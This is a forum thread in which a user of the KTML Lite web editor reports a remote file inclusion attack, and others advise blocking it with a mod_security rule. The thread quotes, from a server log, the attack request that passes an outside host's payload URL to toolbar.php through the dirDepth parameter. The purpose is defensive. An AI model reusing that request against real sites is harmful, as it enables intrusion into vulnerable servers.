Friends of InterAkt Extensions

Have any of you seen any solution to this problem:
THe problem arises from the following attack: /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "http://www.xxxx.xx/ktmlliterf/includes/ ... 2/mass.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
It seems as if youa are able to place phishing code via the two files in ktml
Have a look at the following sites:
http://www.linuxquestions.org/questions ... te-652308/
http://www.placeoweb.com/hack/php/
http://www.securityfocus.com/archive/1/494138
http://www.mail-archive.com/bugtraq@sec ... 27840.html

Could anybody help in finding ways around this securityproblem?
Regards Henri

Hi Henri,
Havn't used ktml lite in ages so I can't really comment on it.
How about asking your host to set a mod_sec rule to check for the problem and block it when it happens.
I am sure (might be totally wrong) that the toolbar.php file will never be used with a http parameter so it should be easy enough to check for such an event.
If it is used with a http parameter, you can check that the domain is the same as where the script is running from. You will definetaly not include a file from a remote domain in that manner.

Coding mod_sec rules are not my forte so it will be best to ask your host for assistance.

Thanks for your reply. I will delete the two files, and see if i has any effect.

What two files do you want to delete?
Deleting toolbar.php will break the script.

What you need to do is check that no-one is calling an external script via the file.

/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt

In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.

Fred wrote:What two files do you want to delete?
Deleting toolbar.php will break the script.

What you need to do is check that no-one is calling an external script via the file.

/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt

In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.

Thank for your help as it was what I experienced, so I will write the workaround as you have outlined. Thanks again

Glad you solved your problem.

Could you post the rule that you created.
It might be useful for someone else as well